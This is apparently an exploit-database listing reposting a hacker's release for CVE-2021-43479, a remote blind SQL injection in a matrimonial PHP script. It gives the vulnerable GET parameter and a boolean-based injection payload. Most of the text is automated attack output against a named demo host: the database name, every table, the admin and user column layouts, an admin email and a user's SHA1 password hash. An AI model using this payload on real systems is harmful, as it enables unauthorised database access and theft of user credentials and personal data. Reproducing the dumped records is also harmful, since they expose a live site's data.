Advertisement
| CVE | Category | Price | Severity |
|---|---|---|---|
| CVE-2021-43479 | CWE-89 | $500 | High |
| Author | Risk | Exploitation Type | Date |
|---|---|---|---|
| Unknown | Critical | Remote | 2022-08-11 |
C r a C k E r
T H E C R A C K O F E T E R N A L M I G H T
From The Ashes and Dust Rises An Unimaginable crack....
[ Exploits ]
: Author : CraCkEr :
Website : uisort.com
Vendor : Uisort Technologies Pvt. Ltd.
Software : Matrimonial PHP Script v1.0 Matrimonial Script PHP tailored with
Demo : stage.matrimic.in advanced features website
Vuln Type: Remote SQL Injection & mobile apps from matrimic
Method : GET
Impact : Database Access
B4nks-NET irc.b4nks.tk #unix
: :
Release Notes:
Typically used for remotely exploitable vulnerabilities that can lead to
system compromise.
Greets:
Phr33k , NK, GoldenX, Wehla, Cap, ZARAGAGA, DarkCatSpace, R0ot, KnG, Centerk
loool, DevS, Dark-Gost, Carlos132sp, ProGenius, bomb, fjear, H3LLB0Y
CryptoJob (Twitter) twitter.com/CryptozJob
CraCkEr 2022
GET parameter 'Userdetails[ud_gender]' is vulnerable
---
Parameter: Userdetails[ud_gender] (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: Userdetails[ud_gender]=1 AND 2636=2636
---
[+] Starting the Attack
[INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
[INFO] fetching current database
[INFO] retrieved: stage_db_qa
[INFO] fetching number of tables for database 'stage_db_qa'
Database: stage_db_qa
[37 tables]
+--------------------+
| YiiCache |
| YiiLog |
| mc_admin |
| mc_blocklist |
| mc_caste |
| mc_city |
| mc_cms |
| mc_contact |
| mc_contact_history |
| mc_country |
| mc_currency |
| mc_deleteprofile |
| mc_education |
| mc_feedback |
| mc_gallery |
| mc_height |
| mc_horoscope |
| mc_import_jobs |
| mc_interest |
| mc_language |
| mc_message |
| mc_occupation |
| mc_partner |
| mc_plan |
| mc_profile_viewed |
| mc_religion |
| mc_searchlist |
| mc_settings |
| mc_shortlist |
| mc_sms_history |
| mc_state |
| mc_subcaste |
| mc_success_story |
| mc_toungue |
| mc_transaction |
| mc_user |
| mc_userdetails |
+--------------------+
[INFO] fetching columns for table 'mc_admin' in database 'stage_db_qa'
Database: stage_db_qa
Table: mc_admin
[4 columns]
+--------------+-------------+
| Column | Type |
+--------------+-------------+
| admin_email | varchar(32) |
| admin_id | int(11) |
| admin_name | varchar(32) |
| admin_status | int(11) |
+--------------+-------------+
[INFO] fetching number of column(s) 'admin_email,admin_id,admin_name,admin_status' entries for table 'mc_admin' in database 'stage_db_qa'
Database: stage_db_qa
Table: mc_admin
[1 entry]
+----------+-----------------------+------------+--------------+
| admin_id | admin_email | admin_name | admin_status |
+----------+-----------------------+------------+--------------+
| 1 | admin@mat\x81imic.com | Admin | 1 |
+----------+-----------------------+------------+--------------+
[INFO] fetching columns for table 'mc_user' in database 'stage_db_qa'
Database: stage_db_qa
Table: mc_user
[20 columns]
+------------------------+--------------+
| Column | Type |
+------------------------+--------------+
| api_token | varchar(255) |
| code | varchar(128) |
| device | varchar(32) |
| user_activecode | varchar(32) |
| user_activedate | datetime |
| user_activestatus | int(11) |
| user_android_device_id | varchar(255) |
| user_email | varchar(32) |
| user_id | int(11) |
| user_ios_device_id | varchar(255) |
| user_ipaddress | varchar(32( |
| user_lastlogin | datetime |
| user_mobile | bigint(20) |
| user_opensource | varchar(32) |
| user_password | varchar(255) |
| user_salt | varchar(64) |
| user_status | int(11) |
| user_type | int(11) |
| user_userid | int(11) |
| user_verified_token | varchar(255) |
+------------------------+--------------+
[INFO] fetching number of column(s) 'user_email,user_id,user_password,user_type,user_userid' entries for table 'mc_user' in database 'stage_db_qa'
Database: stage_db_qa
Table: mc_user
[1 entry]
+---------+--------------------+------------------------------------------+-----------+-------------+
| user_id | user_email | user_password | user_type | user_userid |
+---------+--------------------+------------------------------------------+-----------+-------------+
| 1 | [email protected] | fa4c71db18591d0323141b39ab337b59b584b3b9 | 1 | 1 |
+---------+--------------------+------------------------------------------+-----------+-------------+
Possible Algorithms: SHA1
[-] Done
Copyright ©2024 Exploitalert.